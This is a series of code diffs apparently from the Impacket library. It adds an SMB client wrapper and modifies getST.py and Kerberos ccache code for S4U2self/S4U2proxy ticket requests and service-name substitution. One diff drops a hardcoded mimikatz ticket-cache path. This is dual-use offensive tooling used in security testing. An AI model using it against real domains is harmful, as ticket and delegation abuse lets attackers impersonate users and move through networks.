+        if self.getDialect() == smb.SMB_DIALECT:
+            _, flags2 = self._SMBConnection.get_flags()
+
+            pathName = pathName.replace('/', '\\')
+            packetPathName = pathName.encode('utf-16le') if flags2 & smb.SMB.FLAGS2_UNICODE else pathName
+
+            ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
+            ntCreate['Parameters'] = smb.SMBNtCreateAndX_Parameters()
+            ntCreate['Data']       = smb.SMBNtCreateAndX_Data(flags=flags2)
+            ntCreate['Parameters']['FileNameLength']= len(packetPathName)
+            ntCreate['Parameters']['AccessMask']    = desiredAccess
+            ntCreate['Parameters']['FileAttributes']= fileAttributes
+            ntCreate['Parameters']['ShareAccess']   = shareMode
+            ntCreate['Parameters']['Disposition']   = creationDisposition
+            ntCreate['Parameters']['CreateOptions'] = creationOption
+            ntCreate['Parameters']['Impersonation'] = impersonationLevel
+            ntCreate['Parameters']['SecurityFlags'] = securityFlags
+            ntCreate['Parameters']['CreateFlags']   = 0x16
+            ntCreate['Data']['FileName'] = packetPathName
+
+            if flags2 & smb.SMB.FLAGS2_UNICODE:
+                ntCreate['Data']['Pad'] = 0x0
+
+            if createContexts is not None:
+                LOG.error("CreateContexts not supported in SMB1")
+
+            try:
+                return self._SMBConnection.nt_create_andx(treeId, pathName, cmd = ntCreate)
+            except (smb.SessionError, smb3.SessionError) as e:
+                raise SessionError(e.get_error_code(), e.get_error_packet())
+        else:
+            try:
+                return self._SMBConnection.create(treeId, pathName, desiredAccess, shareMode, creationOption,
+                                                  creationDisposition, fileAttributes, impersonationLevel,
+                                                  securityFlags, oplockLevel, createContexts)
+            except (smb.SessionError, smb3.SessionError) as e:
+                raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def writeFile(self, treeId, fileId, data, offset=0):
+        """
+        writes data to a file
+
+        :param HANDLE treeId: a valid handle for the share where the file is to be written
+        :param HANDLE fileId: a valid handle for the file
+        :param string data: buffer with the data to write
+        :param integer offset: offset where to start writing the data
+
+        :return: amount of bytes written
+        :raise SessionError: if error
+        """
+        try:
+            return self._SMBConnection.writeFile(treeId, fileId, data, offset)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def readFile(self, treeId, fileId, offset = 0, bytesToRead = None, singleCall = True):
+        """
+        reads data from a file
+
+        :param HANDLE treeId: a valid handle for the share where the file is to be read
+        :param HANDLE fileId: a valid handle for the file to be read
+        :param integer offset: offset where to start reading the data
+        :param integer bytesToRead: amount of bytes to attempt reading. If None, it will attempt to read Dialect['MaxBufferSize'] bytes.
+        :param boolean singleCall: If True it won't attempt to read all bytesToRead. It will only make a single read call
+
+        :return: the data read. Length of data read is not always bytesToRead
+        :raise SessionError: if error
+        """
+        finished = False
+        data = b''
+        maxReadSize = self._SMBConnection.getIOCapabilities()['MaxReadSize']
+        if bytesToRead is None:
+            bytesToRead = maxReadSize
+        remainingBytesToRead = bytesToRead
+        while not finished:
+            if remainingBytesToRead > maxReadSize:
+                toRead = maxReadSize
+            else:
+                toRead = remainingBytesToRead
+            try:
+                bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
+            except (smb.SessionError, smb3.SessionError) as e:
+                if e.get_error_code() == nt_errors.STATUS_END_OF_FILE:
+                    toRead = b''
+                    break
+                else:
+                    raise SessionError(e.get_error_code(), e.get_error_packet())
+
+            data += bytesRead
+            if len(data) >= bytesToRead:
+                finished = True
+            elif len(bytesRead) == 0:
+                # End of the file achieved.
+                finished = True
+            elif singleCall is True:
+                finished = True
+            else:
+                offset += len(bytesRead)
+                remainingBytesToRead -= len(bytesRead)
+
+        return data
+
+    def closeFile(self, treeId, fileId):
+        """
+        closes a file handle
+
+        :param HANDLE treeId: a valid handle for the share where the file is to be opened
+        :param HANDLE fileId: a valid handle for the file/directory to be closed
+
+        :return: None
+        :raise SessionError: if error
+        """
+        try:
+            return self._SMBConnection.close(treeId, fileId)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def deleteFile(self, shareName, pathName):
+        """
+        removes a file
+
+        :param string shareName: a valid name for the share where the file is to be deleted
+        :param string pathName: the path name to remove
+
+        :return: None
+        :raise SessionError: if error
+        """
+        try:
+            return self._SMBConnection.remove(shareName, pathName)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def queryInfo(self, treeId, fileId):
+        """
+        queries basic information about an opened file/directory
+
+        :param HANDLE treeId: a valid handle for the share where the file is to be queried
+        :param HANDLE fileId: a valid handle for the file/directory to be queried
+
+        :return: a smb.SMBQueryFileStandardInfo structure.
+        :raise SessionError: if error
+        """
+        try:
+            if self.getDialect() == smb.SMB_DIALECT:
+                res = self._SMBConnection.query_file_info(treeId, fileId)
+            else:
+                res = self._SMBConnection.queryInfo(treeId, fileId)
+            return smb.SMBQueryFileStandardInfo(res)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def createDirectory(self, shareName, pathName ):
+        """
+        creates a directory
+
+        :param string shareName: a valid name for the share where the directory is to be created
+        :param string pathName: the path name or the directory to create
+
+        :return: None
+        :raise SessionError: if error
+        """
+        try:
+            return self._SMBConnection.mkdir(shareName, pathName)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def deleteDirectory(self, shareName, pathName):
+        """
+        deletes a directory
+
+        :param string shareName: a valid name for the share where directory is to be deleted
+        :param string pathName: the path name or the directory to delete
+
+        :return: None
+        :raise SessionError: if error
+        """
+        try:
+            return self._SMBConnection.rmdir(shareName, pathName)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def waitNamedPipe(self, treeId, pipeName, timeout = 5):
+        """
+        waits for a named pipe
+
+        :param HANDLE treeId: a valid handle for the share where the pipe is
+        :param string pipeName: the pipe name to check
+        :param integer timeout: time to wait for an answer
+
+        :return: None
+        :raise SessionError: if error
+        """
+        try:
+            return self._SMBConnection.waitNamedPipe(treeId, pipeName, timeout = timeout)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def transactNamedPipe(self, treeId, fileId, data, waitAnswer = True):
+        """
+        writes to a named pipe using a transaction command
+
+        :param HANDLE treeId: a valid handle for the share where the pipe is
+        :param HANDLE fileId: a valid handle for the pipe
+        :param string data: buffer with the data to write
+        :param boolean waitAnswer: whether or not to wait for an answer
+
+        :return: None
+        :raise SessionError: if error
+        """
+        try:
+            return self._SMBConnection.TransactNamedPipe(treeId, fileId, data, waitAnswer = waitAnswer)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def transactNamedPipeRecv(self):
+        """
+        reads from a named pipe using a transaction command
+
+        :return: data read
+        :raise SessionError: if error
+        """
+        try:
+            return self._SMBConnection.TransactNamedPipeRecv()
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def writeNamedPipe(self, treeId, fileId, data, waitAnswer = True):
+        """
+        writes to a named pipe
+
+        :param HANDLE treeId: a valid handle for the share where the pipe is
+        :param HANDLE fileId: a valid handle for the pipe
+        :param string data: buffer with the data to write
+        :param boolean waitAnswer: whether or not to wait for an answer
+
+        :return: None
+        :raise SessionError: if error
+        """
+        try:
+            if self.getDialect() == smb.SMB_DIALECT:
+                return self._SMBConnection.write_andx(treeId, fileId, data, wait_answer = waitAnswer, write_pipe_mode = True)
+            else:
+                return self.writeFile(treeId, fileId, data, 0)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def readNamedPipe(self,treeId, fileId, bytesToRead = None ):
+        """
+        read from a named pipe
+
+        :param HANDLE treeId: a valid handle for the share where the pipe resides
+        :param HANDLE fileId: a valid handle for the pipe
+        :param integer bytesToRead: amount of data to read
+
+        :return: None
+        :raise SessionError: if error
+        """
+
+        try:
+            return self.readFile(treeId, fileId, bytesToRead = bytesToRead, singleCall = True)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+
+    def getFile(self, shareName, pathName, callback, shareAccessMode = None):
+        """
+        downloads a file
+
+        :param string shareName: name for the share where the file is to be retrieved
+        :param string pathName: the path name to retrieve
+        :param callback callback: function called to write the contents read.
+        :param int shareAccessMode:
+
+        :return: None
+        :raise SessionError: if error
+        """
+        try:
+            if shareAccessMode is None:
+                # if share access mode is none, let's the underlying API deals with it
+                return self._SMBConnection.retr_file(shareName, pathName, callback)
+            else:
+                return self._SMBConnection.retr_file(shareName, pathName, callback, shareAccessMode=shareAccessMode)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def putFile(self, shareName, pathName, callback, shareAccessMode = None):
+        """
+        uploads a file
+
+        :param string shareName: name for the share where the file is to be uploaded
+        :param string pathName: the path name to upload
+        :param callback callback: function called to read the contents to be written.
+        :param int shareAccessMode:
+
+        :return: None
+        :raise SessionError: if error
+        """
+        try:
+            if shareAccessMode is None:
+                # if share access mode is none, let's the underlying API deals with it
+                return self._SMBConnection.stor_file(shareName, pathName, callback)
+            else:
+                return self._SMBConnection.stor_file(shareName, pathName, callback, shareAccessMode)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def listSnapshots(self, tid, path):
+        """
+        lists the snapshots for the given directory
+
+        :param int tid: tree id of current connection
+        :param string path: directory to list the snapshots of
+
+        :raise SessionError: if error
+        """
+
+        # Verify we're under SMB2+ session
+        if self.getDialect() not in [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30]:
+            raise SessionError(error = nt_errors.STATUS_NOT_SUPPORTED)
+
+        fid = self.openFile(tid, path, FILE_READ_DATA | FILE_READ_EA | FILE_READ_ATTRIBUTES | READ_CONTROL | SYNCHRONIZE,
+                            fileAttributes=None, creationOption=FILE_SYNCHRONOUS_IO_NONALERT,
+                            shareMode=FILE_SHARE_READ | FILE_SHARE_WRITE)
+
+        # first send with maxOutputResponse=16 to get the required size
+        try:
+            snapshotData = SRV_SNAPSHOT_ARRAY(self._SMBConnection.ioctl(tid, fid, FSCTL_SRV_ENUMERATE_SNAPSHOTS,
+                                  flags=SMB2_0_IOCTL_IS_FSCTL, maxOutputResponse=16))
+        except (smb.SessionError, smb3.SessionError) as e:
+            self.closeFile(tid, fid)
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+        if snapshotData['SnapShotArraySize'] >= 52:
+            # now send an appropriate sized buffer
+            try:
+               snapshotData = SRV_SNAPSHOT_ARRAY(self._SMBConnection.ioctl(tid, fid, FSCTL_SRV_ENUMERATE_SNAPSHOTS,
+                                  flags=SMB2_0_IOCTL_IS_FSCTL, maxOutputResponse=snapshotData['SnapShotArraySize']+12))
+            except (smb.SessionError, smb3.SessionError) as e:
+               self.closeFile(tid, fid)
+               raise SessionError(e.get_error_code(), e.get_error_packet())
+
+        self.closeFile(tid, fid)
+        return list(filter(None, snapshotData['SnapShots'].decode('utf16').split('\x00')))
+
+    def createMountPoint(self, tid, path, target):
+        """
+        creates a mount point at an existing directory
+
+        :param int tid: tree id of current connection
+        :param string path: directory at which to create mount point (must already exist)
+        :param string target: target address of mount point
+
+        :raise SessionError: if error
+        """
+
+        # Verify we're under SMB2+ session
+        if self.getDialect() not in [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30]:
+            raise SessionError(error = nt_errors.STATUS_NOT_SUPPORTED)
+
+        fid = self.openFile(tid, path, GENERIC_READ | GENERIC_WRITE,
+                            creationOption=FILE_OPEN_REPARSE_POINT)
+
+        if target.startswith("\\"):
+            fixed_name  = target.encode('utf-16le')
+        else:
+            fixed_name  = ("\\??\\" + target).encode('utf-16le')
+
+        name        = target.encode('utf-16le')
+
+        reparseData = MOUNT_POINT_REPARSE_DATA_STRUCTURE()
+
+        reparseData['PathBuffer']           = fixed_name + b"\x00\x00" + name + b"\x00\x00"
+        reparseData['SubstituteNameLength'] = len(fixed_name)
+        reparseData['PrintNameOffset']      = len(fixed_name) + 2
+        reparseData['PrintNameLength']      = len(name)
+
+        self._SMBConnection.ioctl(tid, fid, FSCTL_SET_REPARSE_POINT, flags=SMB2_0_IOCTL_IS_FSCTL,
+                                  inputBlob=reparseData)
+
+        self.closeFile(tid, fid)
+
+    def removeMountPoint(self, tid, path):
+        """
+        removes a mount point without deleting the underlying directory
+
+        :param int tid: tree id of current connection
+        :param string path: path to mount point to remove
+
+        :raise SessionError: if error
+        """
+
+        # Verify we're under SMB2+ session
+        if self.getDialect() not in [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30]:
+            raise SessionError(error = nt_errors.STATUS_NOT_SUPPORTED)
+
+        fid = self.openFile(tid, path, GENERIC_READ | GENERIC_WRITE,
+                            creationOption=FILE_OPEN_REPARSE_POINT)
+
+        reparseData = MOUNT_POINT_REPARSE_GUID_DATA_STRUCTURE()
+
+        reparseData['DataBuffer'] = b""
+
+        try:
+            self._SMBConnection.ioctl(tid, fid, FSCTL_DELETE_REPARSE_POINT, flags=SMB2_0_IOCTL_IS_FSCTL,
+                                      inputBlob=reparseData)
+        except (smb.SessionError, smb3.SessionError) as e:
+            self.closeFile(tid, fid)
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+        self.closeFile(tid, fid)
+
+    def rename(self, shareName, oldPath, newPath):
+        """
+        renames a file/directory
+
+        :param string shareName: name for the share where the files/directories are
+        :param string oldPath: the old path name or the directory/file to rename
+        :param string newPath: the new path name or the directory/file to rename
+
+        :return: True
+        :raise SessionError: if error
+        """
+
+        try:
+            return self._SMBConnection.rename(shareName, oldPath, newPath)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def reconnect(self):
+        """
+        reconnects the SMB object based on the original options and credentials used. Only exception is that
+        manualNegotiate will not be honored.
+        Not only the connection will be created but also a login attempt using the original credentials and
+        method (Kerberos, PtH, etc)
+
+        :return: True
+        :raise SessionError: if error
+        """
+        userName, password, domain, lmhash, nthash, aesKey, TGT, TGS = self.getCredentials()
+        self.negotiateSession(self._preferredDialect)
+        if self._doKerberos is True:
+            self.kerberosLogin(userName, password, domain, lmhash, nthash, aesKey, self._kdcHost, TGT, TGS, self._useCache)
+        else:
+            self.login(userName, password, domain, lmhash, nthash, self._ntlmFallback)
+
+        return True
+
+    def setTimeout(self, timeout):
+        try:
+            return self._SMBConnection.set_timeout(timeout)
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+
+    def getSessionKey(self):
+        if self.getDialect() == smb.SMB_DIALECT:
+            return self._SMBConnection.get_session_key()
+        else:
+            return self._SMBConnection.getSessionKey()
+
+    def setSessionKey(self, key):
+        if self.getDialect() == smb.SMB_DIALECT:
+            return self._SMBConnection.set_session_key(key)
+        else:
+            return self._SMBConnection.setSessionKey(key)
+
+    def setHostnameValidation(self, validate, accept_empty, hostname):
+        return self._SMBConnection.set_hostname_validation(validate, accept_empty, hostname)
+
+    def close(self):
+        """
+        logs off and closes the underlying _NetBIOSSession()
+
+        :return: None
+        """
+        try:
+            self.logoff()
+        except:
+            pass
+        self._SMBConnection.close_session()
+
+
+class SessionError(Exception):
+    """
+    This is the exception every client should catch regardless of the underlying
+    SMB version used. We'll take care of that. NETBIOS exceptions are NOT included,
+    since all SMB versions share the same NETBIOS instances.
+    """
+    def __init__( self, error = 0, packet=0):
+        Exception.__init__(self)
+        self.error = error
+        self.packet = packet
+
+    def getErrorCode( self ):
+        return self.error
+
+    def getErrorPacket( self ):
+        return self.packet
+
+    def getErrorString( self ):
+        return nt_errors.ERROR_MESSAGES[self.error]
+
+    def __str__( self ):
+        if self.error in nt_errors.ERROR_MESSAGES:
+            return 'SMB SessionError: %s(%s)' % (nt_errors.ERROR_MESSAGES[self.error])
+        else:
+            return 'SMB SessionError: 0x%x' % self.error

--- a/examples/getST.py
+++ b/examples/getST.py
@@ -82,21 +82,12 @@ class GETST:
         if options.hashes is not None:
             self.__lmhash, self.__nthash = options.hashes.split(':')
 
-    def saveTicket(self, ticket, sessionKey,clientName=None, alt_service=None):
-        clientName=clientName.components[0]
-        if clientName!=None:
-            logging.info('Saving ticket in %s_s4u2self.ccache' % clientName)
-            ccache = CCache()
+    def saveTicket(self, ticket, sessionKey, alt_service=None):
+        logging.info('Saving ticket in %s' % (self.__saveFileName + '.ccache'))
+        ccache = CCache()
 
-            ccache.fromTGS(ticket, sessionKey, sessionKey, alt_service)
-            ccache.saveFile('%s_s4u2self.ccache'% clientName)
-        else:
-
-            logging.info('Saving ticket in %s' % (self.__saveFileName + '.ccache'))
-            ccache = CCache()
-
-            ccache.fromTGS(ticket, sessionKey, sessionKey)
-            ccache.saveFile(self.__saveFileName + '.ccache')
+        ccache.fromTGS(ticket, sessionKey, sessionKey, alt_service)
+        ccache.saveFile(self.__saveFileName + '.ccache')
 
     def doS4U2ProxyWithAdditionalTicket(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost, additional_ticket_path):
         if not os.path.isfile(additional_ticket_path):
@@ -431,8 +422,7 @@ class GETST:
 
         r = sendReceive(message, self.__domain, kdcHost)
         if s4u2self:
-            self.saveTicket(r,sessionKey, clientName, alt_service)
-        return
+            return r, cipher, oldSessionKey, sessionKey
         tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
 
         if logging.getLogger().level == logging.DEBUG:

--- a/examples/getST.py
+++ b/examples/getST.py
@@ -731,7 +731,7 @@ if __name__ == '__main__':
         logging.debug(version.getInstallationPath())
     else:
         logging.getLogger().setLevel(logging.INFO)
-    if len(options.alt_service.split('/')) != 2:
+    if options.alt_service != None and len(options.alt_service.split('/')) != 2:
         logging.critical('alt-service should be specified as service/host format')
         sys.exit(1)
     domain, username, password = parse_credentials(options.identity)

--- a/examples/getST.py
+++ b/examples/getST.py
@@ -1,4 +1,4 @@
-#!C:\Users\x\AppData\Local\Programs\Python\Python39\python.exe
+#!/usr/bin/env python
 # Impacket - Collection of Python classes for working with network protocols.
 #
 # SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
@@ -633,7 +633,7 @@ class GETST:
         # Do we have a TGT cached?
         tgt = None
         try:
-            ccache = CCache.loadFile(r'C:\Users\x\1\mimikatz_trunk\x64\WIN-ER6H1V81DV9.ccache')
+            ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
             logging.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
             principal = 'krbtgt/%s@%s' % (self.__domain.upper(), self.__domain.upper())
             creds = ccache.getCredential(principal)

--- a/examples/getST.py
+++ b/examples/getST.py
@@ -1,6 +1,6 @@
 # Impacket - Collection of Python classes for working with network protocols.
 #
-# SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved.
+# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
 #
 # This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file

--- a/impacket/krb5/ccache.py
+++ b/impacket/krb5/ccache.py
@@ -141,7 +141,7 @@ class Principal:
             else:
                 component = component['data']
             principal += component + b'/'
-        
+
         principal = principal[:-1]
         if isinstance(self.realm['data'], bytes):
             realm = self.realm['data']
@@ -360,7 +360,7 @@ class CCache:
 
     def getCredential(self, server, anySPN=True):
         for c in self.credentials:
-            if c['server'].prettyPrint().upper() == b(server.upper()) or c['server'].prettyPrint().upper().split(b'@')[0] == b(server.upper())\
+            if c['server'].prettyPrint().upper() == b(server.upper()) or c['server'].prettyPrint().upper().split(b'@')[0] == b(server.upper()) \
                     or c['server'].prettyPrint().upper().split(b'@')[0] == b(server.upper().split('@')[0]):
                 LOG.debug('Returning cached credential for %s' % c['server'].prettyPrint().upper().decode('utf-8'))
                 return c
@@ -374,7 +374,7 @@ class CCache:
                     # Let's take the port out for comparison
                     cachedSPN = (c['server'].prettyPrint().upper().split(b'/')[1].split(b'@')[0].split(b':')[0] + b'@' + c['server'].prettyPrint().upper().split(b'/')[1].split(b'@')[1])
                     searchSPN = '%s@%s' % (server.upper().split('/')[1].split('@')[0].split(':')[0],
-                                               server.upper().split('/')[1].split('@')[1])
+                                           server.upper().split('/')[1].split('@')[1])
                     if cachedSPN == b(searchSPN):
                         LOG.debug('Returning cached credential for %s' % c['server'].prettyPrint().upper().decode('utf-8'))
                         return c
@@ -539,7 +539,7 @@ class CCache:
         print("Credentials: ")
         for i, credential in enumerate(self.credentials):
             print(("[%d]" % i))
-            credential.prettyPrint('\t') 
+            credential.prettyPrint('\t')
 
     @classmethod
     def loadKirbiFile(cls, fileName):

--- a/impacket/krb5/ccache.py
+++ b/impacket/krb5/ccache.py
@@ -455,7 +455,7 @@ class CCache:
         credential.secondTicket['length'] = 0
         self.credentials.append(credential)
 
-    def fromTGS(self, tgs, oldSessionKey, sessionKey, alt_service=None):
+    def fromTGS(self, tgs, oldSessionKey, sessionKey):
         self.headers = []
         header = Header()
         header['tag'] = 1
@@ -484,7 +484,7 @@ class CCache:
 
         credential = Credential()
         server = types.Principal()
-        server.from_asn1(encTGSRepPart, 'srealm', 'sname', alt_service)
+        server.from_asn1(encTGSRepPart, 'srealm', 'sname')
         tmpServer = Principal()
         tmpServer.fromPrincipal(server)
 
@@ -511,10 +511,6 @@ class CCache:
         credential['num_address'] = 0
 
         credential.ticket = CountedOctetString()
-        if alt_service != None:
-            decodedTGS['ticket']['sname']['name-type'] = 0
-            decodedTGS['ticket']['sname']['name-string'][0] = alt_service.split('/')[0]
-            decodedTGS['ticket']['sname']['name-string'][1] = alt_service.split('/')[1]
         credential.ticket['data'] = encoder.encode(decodedTGS['ticket'].clone(tagSet=Ticket.tagSet, cloneValueFlag=True))
         credential.ticket['length'] = len(credential.ticket['data'])
         credential.secondTicket = CountedOctetString()

--- a/impacket/krb5/ccache.py
+++ b/impacket/krb5/ccache.py
@@ -455,7 +455,7 @@ class CCache:
         credential.secondTicket['length'] = 0
         self.credentials.append(credential)
 
-    def fromTGS(self, tgs, oldSessionKey, sessionKey):
+    def fromTGS(self, tgs, oldSessionKey, sessionKey, alt_service=None):
         self.headers = []
         header = Header()
         header['tag'] = 1
@@ -484,7 +484,7 @@ class CCache:
 
         credential = Credential()
         server = types.Principal()
-        server.from_asn1(encTGSRepPart, 'srealm', 'sname')
+        server.from_asn1(encTGSRepPart, 'srealm', 'sname', alt_service)
         tmpServer = Principal()
         tmpServer.fromPrincipal(server)
 
@@ -511,6 +511,10 @@ class CCache:
         credential['num_address'] = 0
 
         credential.ticket = CountedOctetString()
+        if alt_service != None:
+            decodedTGS['ticket']['sname']['name-type'] = 0
+            decodedTGS['ticket']['sname']['name-string'][0] = alt_service.split('/')[0]
+            decodedTGS['ticket']['sname']['name-string'][1] = alt_service.split('/')[1]
         credential.ticket['data'] = encoder.encode(decodedTGS['ticket'].clone(tagSet=Ticket.tagSet, cloneValueFlag=True))
         credential.ticket['length'] = len(credential.ticket['data'])
         credential.secondTicket = CountedOctetString()

--- a/impacket/krb5/ccache.py
+++ b/impacket/krb5/ccache.py
@@ -484,7 +484,7 @@ class CCache:
 
         credential = Credential()
         server = types.Principal()
-        server.from_asn1(encTGSRepPart, 'srealm', 'sname', alt_service)
+        server.from_asn1(encTGSRepPart, 'srealm', 'sname')
         tmpServer = Principal()
         tmpServer.fromPrincipal(server)
 

--- a/impacket/krb5/ccache.py
+++ b/impacket/krb5/ccache.py
@@ -360,7 +360,7 @@ class CCache:
 
     def getCredential(self, server, anySPN=True):
         for c in self.credentials:
-            if c['server'].prettyPrint().upper() == b(server.upper()) or c['server'].prettyPrint().upper().split(b'@')[0] == b(server.upper()) \
+            if c['server'].prettyPrint().upper() == b(server.upper()) or c['server'].prettyPrint().upper().split(b'@')[0] == b(server.upper())\
                     or c['server'].prettyPrint().upper().split(b'@')[0] == b(server.upper().split('@')[0]):
                 LOG.debug('Returning cached credential for %s' % c['server'].prettyPrint().upper().decode('utf-8'))
                 return c

--- a/impacket/krb5/ccache.py
+++ b/impacket/krb5/ccache.py
@@ -360,7 +360,7 @@ class CCache:
 
     def getCredential(self, server, anySPN=True):
         for c in self.credentials:
-            if c['server'].prettyPrint().upper() == b(server.upper()) or c['server'].prettyPrint().upper().split(b'@')[0] == b(server.upper())\
+            if c['server'].prettyPrint().upper() == b(server.upper()) or c['server'].prettyPrint().upper().split(b'@')[0] == b(server.upper()) \
                     or c['server'].prettyPrint().upper().split(b'@')[0] == b(server.upper().split('@')[0]):
                 LOG.debug('Returning cached credential for %s' % c['server'].prettyPrint().upper().decode('utf-8'))
                 return c
@@ -484,7 +484,7 @@ class CCache:
 
         credential = Credential()
         server = types.Principal()
-        server.from_asn1(encTGSRepPart, 'srealm', 'sname')
+        server.from_asn1(encTGSRepPart, 'srealm', 'sname', alt_service)
         tmpServer = Principal()
         tmpServer.fromPrincipal(server)
 

--- a/impacket/krb5/types.py
+++ b/impacket/krb5/types.py
@@ -137,14 +137,12 @@ If the value contains no realm, then default_realm will be used."""
         return "Principal((" + repr(self.components) + ", " + \
                repr(self.realm) + "), t=" + str(self.type) + ")"
 
-    def from_asn1(self, data, realm_component, name_component, alt_service=None):
+    def from_asn1(self, data, realm_component, name_component):
         name = data.getComponentByName(name_component)
         self.type = constants.PrincipalNameType(
             name.getComponentByName('name-type')).value
         self.components = [
             str(c) for c in name.getComponentByName('name-string')]
-        if name_component == "sname" and alt_service!=None:
-            self.components = alt_service.split('/')
         self.realm = str(data.getComponentByName(realm_component))
         return self
 

--- a/impacket/krb5/types.py
+++ b/impacket/krb5/types.py
@@ -137,12 +137,14 @@ If the value contains no realm, then default_realm will be used."""
         return "Principal((" + repr(self.components) + ", " + \
                repr(self.realm) + "), t=" + str(self.type) + ")"
 
-    def from_asn1(self, data, realm_component, name_component):
+    def from_asn1(self, data, realm_component, name_component, alt_service=None):
         name = data.getComponentByName(name_component)
         self.type = constants.PrincipalNameType(
             name.getComponentByName('name-type')).value
         self.components = [
             str(c) for c in name.getComponentByName('name-string')]
+        if name_component == "sname" and alt_service!=None:
+            self.components = alt_service.split('/')
         self.realm = str(data.getComponentByName(realm_component))
         return self
 

--- a/impacket/krb5/types.py
+++ b/impacket/krb5/types.py
@@ -48,14 +48,12 @@ from . import constants
 class KerberosException(Exception):
     pass
 
-
 def _asn1_decode(data, asn1Spec):
-    if isinstance(data, str) or isinstance(data, bytes):
+    if isinstance(data, str) or isinstance(data,bytes):
         data, substrate = decoder.decode(data, asn1Spec=asn1Spec)
         if substrate != b'':
             raise KerberosException("asn1 encoding invalid")
     return data
-
 
 # A principal can be represented as:
 
@@ -67,7 +65,6 @@ class Principal(object):
   component is the realm
 
 If the value contains no realm, then default_realm will be used."""
-
     def __init__(self, value=None, default_realm=None, type=None):
         self.type = constants.PrincipalNameType.NT_UNKNOWN
         self.components = []
@@ -76,7 +73,7 @@ If the value contains no realm, then default_realm will be used."""
         if value is None:
             return
 
-        try:  # Python 2
+        try:               # Python 2
             if isinstance(value, unicode):
                 value = value.encode('utf-8')
         except NameError:  # Python 3
@@ -118,12 +115,12 @@ If the value contains no realm, then default_realm will be used."""
             self.type = type
 
     def __eq__(self, other):
-        if isinstance(other, str):
-            other = Principal(other)
+        if isinstance (other, str):
+            other = Principal (other)
 
         return (self.type == constants.PrincipalNameType.NT_UNKNOWN.value or
                 other.type == constants.PrincipalNameType.NT_UNKNOWN.value or
-                self.type == other.type) and all(map(lambda a, b: a == b, self.components, other.components)) and \
+                self.type == other.type) and all (map (lambda a, b: a == b, self.components, other.components)) and \
                self.realm == other.realm
 
     def __str__(self):
@@ -159,7 +156,6 @@ If the value contains no realm, then default_realm will be used."""
             strings.setComponentByPosition(i, c)
 
         return name
-
 
 class Address(object):
     DIRECTIONAL_AP_REQ_SENDER = struct.pack('!I', 0)
@@ -199,7 +195,6 @@ class Address(object):
         # ipv4-mapped ipv6 addresses must be encoded as ipv4.
         pass
 
-
 class EncryptedData(object):
     def __init__(self):
         self.etype = None
@@ -223,7 +218,6 @@ class EncryptedData(object):
             component.setComponentByName('kvno', self.kvno)
         component.setComponentByName('cipher', self.ciphertext)
         return component
-
 
 class Ticket(object):
     def __init__(self):
@@ -251,8 +245,7 @@ class Ticket(object):
         return component
 
     def __str__(self):
-        return "<Ticket for %s vno %s>" % (str(self.service_principal), str(self.encrypted_part.kvno))
-
+        return "<Ticket for %s vno %s>" % (str(self.service_principal), str(self.encrypted_part.kvno)) 
 
 class KerberosTime(object):
     INDEFINITE = datetime.datetime(1970, 1, 1, 0, 0, 0)
@@ -276,7 +269,6 @@ class KerberosTime(object):
         if data[14] != 'Z':
             raise KerberosException("timezone in KerberosTime is not Z")
         return datetime.datetime(year, month, day, hour, minute, second)
-
 
 if __name__ == '__main__':
     # TODO marc: turn this into a real test

--- a/impacket/krb5/types.py
+++ b/impacket/krb5/types.py
@@ -137,13 +137,15 @@ If the value contains no realm, then default_realm will be used."""
         return "Principal((" + repr(self.components) + ", " + \
                repr(self.realm) + "), t=" + str(self.type) + ")"
 
-    def from_asn1(self, data, realm_component, name_component):
+    def from_asn1(self, data, realm_component, name_component, alt_service=None):
         name = data.getComponentByName(name_component)
         self.type = constants.PrincipalNameType(
             name.getComponentByName('name-type')).value
         self.components = [
             str(c) for c in name.getComponentByName('name-string')]
         self.realm = str(data.getComponentByName(realm_component))
+        if name_component == "sname" and alt_service!=None:
